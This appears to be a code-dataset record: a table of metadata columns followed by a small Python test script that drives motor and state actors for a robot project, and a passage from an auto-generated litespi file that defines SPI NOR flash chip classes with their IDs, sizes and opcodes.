hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
385d25fcb4fa88c316bef5c86d69d80aef42c4fe
| 1,370
|
py
|
Python
|
test/test_actors.py
|
sapka12/frogbot_py
|
7495e91f66d9e5db42a9bfa527a954429509a2e5
|
[
"Apache-2.0"
] | null | null | null |
test/test_actors.py
|
sapka12/frogbot_py
|
7495e91f66d9e5db42a9bfa527a954429509a2e5
|
[
"Apache-2.0"
] | null | null | null |
test/test_actors.py
|
sapka12/frogbot_py
|
7495e91f66d9e5db42a9bfa527a954429509a2e5
|
[
"Apache-2.0"
] | null | null | null |
import time
from actors import *
if __name__ == '__main__':
def wait(direction):
print(direction)
time.sleep(1)
motor = MotorActor.start(action_with_direction=wait)
state = StateActor.start(motor_actor_ref=motor)
def scenario_1():
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "left"})
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "forward"})
state.tell({ACTION: OK})
def scenario_2():
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "left"})
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "forward"})
state.tell({ACTION: OK})
time.sleep(1)
state.tell({ACTION: CANCEL})
def scenario_3():
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "left"})
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "forward"})
state.tell({ACTION: OK})
time.sleep(1)
state.tell({ACTION: OK})
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "left"})
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "forward"})
state.tell({ACTION: OK})
def scenario_4():
state.tell({ACTION: OK})
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "left"})
state.tell({ACTION: ADD_DIRECTION, DIRECTION: "forward"})
state.tell({ACTION: OK})
scenario_4()
time.sleep(5)
state.stop()
motor.stop()
| 26.346154
| 65
| 0.616058
| 159
| 1,370
| 5.138365
| 0.213836
| 0.198286
| 0.330477
| 0.220318
| 0.723378
| 0.723378
| 0.723378
| 0.723378
| 0.723378
| 0.723378
| 0
| 0.008612
| 0.237226
| 1,370
| 51
| 66
| 26.862745
| 0.773206
| 0
| 0
| 0.555556
| 0
| 0
| 0.045985
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.138889
| false
| 0
| 0.055556
| 0
| 0.194444
| 0.027778
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38a3903fc76af3e3823ed3a994a20f4d5966a95e
| 208,274
|
py
|
Python
|
litespi/modules/generated_modules.py
|
thirtythreeforty/litespi
|
3f6b32b0b3b93a22b0e8c6eaa19556282251c3c5
|
[
"BSD-2-Clause"
] | null | null | null |
litespi/modules/generated_modules.py
|
thirtythreeforty/litespi
|
3f6b32b0b3b93a22b0e8c6eaa19556282251c3c5
|
[
"BSD-2-Clause"
] | null | null | null |
litespi/modules/generated_modules.py
|
thirtythreeforty/litespi
|
3f6b32b0b3b93a22b0e8c6eaa19556282251c3c5
|
[
"BSD-2-Clause"
] | null | null | null |
# Generated using 'spi_nor_cfg_gen.py'
from litespi.spi_nor_flash_module import SpiNorFlashModule
from litespi.opcodes import SpiNorFlashOpCodes
from litespi.ids import SpiNorFlashManufacturerIDs
class X160S33B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8911
name = "160s33b"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class X25DF081A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4501
name = "25df081a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X25F160S33B8(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8911
name = "25f160s33b8"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X25F160S33T8(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8915
name = "25f160s33t8"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X25F320S33B8(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8912
name = "25f320s33b8"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X25F320S33T8(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8916
name = "25f320s33t8"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X25F640S33B8(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8913
name = "25f640s33b8"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X25F640S33T8(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8917
name = "25f640s33t8"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X320S33B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8912
name = "320s33b"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class X3S1400AN(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2600
name = "3S1400AN"
total_size = 2162688 # bytes
page_size = 528 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X3S200AN(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2400
name = "3S200AN"
total_size = 540672 # bytes
page_size = 264 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X3S400AN(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2400
name = "3S400AN"
total_size = 540672 # bytes
page_size = 264 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X3S50AN(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2200
name = "3S50AN"
total_size = 135168 # bytes
page_size = 264 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X3S700AN(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x2500
name = "3S700AN"
total_size = 1081344 # bytes
page_size = 264 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class X640S33B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.INTEL
device_id = 0x8913
name = "640s33b"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class XM25QH128A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x7018
name = "XM25QH128A"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class XM25QH64A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x7017
name = "XM25QH64A"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class A25L010(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x3011
name = "a25l010"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L016(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x3015
name = "a25l016"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L020(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x3012
name = "a25l020"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x3016
name = "a25l032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L040(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x3013
name = "a25l040"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L05PT(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2020
name = "a25l05pt"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L05PU(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2010
name = "a25l05pu"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L080(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x3014
name = "a25l080"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L10PT(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2021
name = "a25l10pt"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L10PU(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2011
name = "a25l10pu"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L16PT(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2025
name = "a25l16pt"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L16PU(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2015
name = "a25l16pu"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L20PT(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2022
name = "a25l20pt"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L20PU(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2012
name = "a25l20pu"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L40PU(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2013
name = "a25l40pu"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x3010
name = "a25l512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25L80P(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x2014
name = "a25l80p"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25LQ032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x4016
name = "a25lq032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25LQ16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x4015
name = "a25lq16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25LQ32A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x4016
name = "a25lq32a"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class A25LQ64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.AMIC
device_id = 0x4017
name = "a25lq64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class AT25DF021(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4300
name = "at25df021"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25DF021A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4301
name = "at25df021a"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25DF041A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4401
name = "at25df041a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT25DF081A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4501
name = "at25df081a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25DF161(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4602
name = "at25df161"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25DF321(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4700
name = "at25df321"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT25DF321A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4701
name = "at25df321a"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT25DF641(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4800
name = "at25df641"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT25DF641A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4800
name = "at25df641a"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25DL081(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4502
name = "at25dl081"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25DL161(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x4603
name = "at25dl161"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25DQ161(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x8600
name = "at25dq161"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25F1024(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x0060
name = "at25f1024"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25F1024A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x0060
name = "at25f1024a"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25F2048(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x0063
name = "at25f2048"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25F4096(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x0064
name = "at25f4096"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25F512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x0060
name = "at25f512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25F512A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x0065
name = "at25f512a"
total_size = 65536 # bytes
page_size = 128 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25F512B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x6500
name = "at25f512b"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class AT25FS010(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x6601
name = "at25fs010"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class AT25FS040(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ATMEL
device_id = 0x6604
